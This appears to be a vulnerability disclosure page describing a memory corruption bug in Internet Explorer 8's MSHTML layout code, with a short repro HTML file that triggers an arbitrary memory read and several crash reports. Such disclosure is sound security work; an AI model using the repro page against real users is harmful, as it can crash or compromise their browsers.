This is a friendly warning that your web-browser does not currently protecting your privacy and/or security as well as you might want. Click on this message to see more information about the issue(s) that were detected. November 21st, 2016 MSIE 8 MSHTML Ptls5::Ls­Find­Span­Visual­Boundaries memory corruption

MSIE8 MSHTML Ptls5::Ls­Find­Span­Visual­Boundaries memory corruption

(The fix and CVE number for this bug are unknown)

Synopsis

A specially crafted web-page can cause an unknown type of memory corruption in Microsoft Internet Explorer 8. This vulnerability can cause the Ptls5::Ls­Find­Span­Visual­Boundaries method (or other methods called by it) to access arbitrary memory.

Known affected software, attack vectors and mitigations

  • Microsoft Internet Explorer 8

    An attacker would need to get a target user to open a specially crafted web-page. Java­Script is not necessarily required to trigger the issue.

Description

The memory corruption causes the Ptls5::Ls­Find­Span­Visual­Boundaries method to access data at seemingly random addresses. However, these addresses appear to always be in the same range as valid heap addresses, even if they are often not DWORD aligned. The reason for the memory corruption is not immediately obvious.

Repro.html <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <body> <button> <pre> <x> <sub> <ruby> <img height="1"/> </ruby> </sub> </x> </pre> </button> </body> </html>

Time-line

  • July 2014: This vulnerability was found through fuzzing.
  • November 2016: Details of this issue are released.
Bug­Id report: mshtml.dll!Ptls5::Ls­Find­List­Du Arbitrary~021 AVR(67C1FF4C)
id:             mshtml.dll!Ptls5::Ls­Find­List­Du Arbitrary~021 AVR(67C1FF4C)
description:    Security: Attempt to read from unallocated arbitrary memory (@0x000B2021) in mshtml.dll!Ptls5::Ls­Find­List­Du
note:           Based on this information, this is expected to be a security issue!
This report was generated using a predecessor of Bug­Id, a Python script created to detect, analyze and id application bugs. Don't waste time manually analyzing issues and writing reports but try Bug­Id out yourself today! You'll get even better reports than this one with the current version.
Bug­Id report: mshtml.dll!Ptls5::Ls­Find­Span­Visual­Boundaries Arbitrary~0EE AVR(A2DF6722)
id:             mshtml.dll!Ptls5::Ls­Find­Span­Visual­Boundaries Arbitrary~0EE AVR(A2DF6722)
description:    Security: Attempt to read from unallocated arbitrary memory (@0x000DA0EE) in mshtml.dll!Ptls5::Ls­Find­Span­Visual­Boundaries
note:           Based on this information, this is expected to be a security issue!
This report was generated using a predecessor of Bug­Id, a Python script created to detect, analyze and id application bugs. Don't waste time manually analyzing issues and writing reports but try Bug­Id out yourself today! You'll get even better reports than this one with the current version.
Bug­Id report: mshtml.dll!Ptls5::Ls­Find­Span­Visual­Boundaries Guard­Page(A2DF6722)
id:             mshtml.dll!Ptls5::Ls­Find­Span­Visual­Boundaries Guard­Page(A2DF6722)
description:    Guard page violation in mshtml.dll!Ptls5::Ls­Find­Span­Visual­Boundaries
This report was generated using a predecessor of Bug­Id, a Python script created to detect, analyze and id application bugs. Don't waste time manually analyzing issues and writing reports but try Bug­Id out yourself today! You'll get even better reports than this one with the current version.
© Copyright 2017 by Sky­Lined. Last updated on August 19th, 2017. Creative Commons License This work is licensed under a Creative Commons Attribution-Non‑Commercial 4.0 International License. If you find this web-site useful and would like to make a donation, you can send bitcoin to 183yyxa9s1s1f7JBp­PHPmz­Q346y91Rx5DX.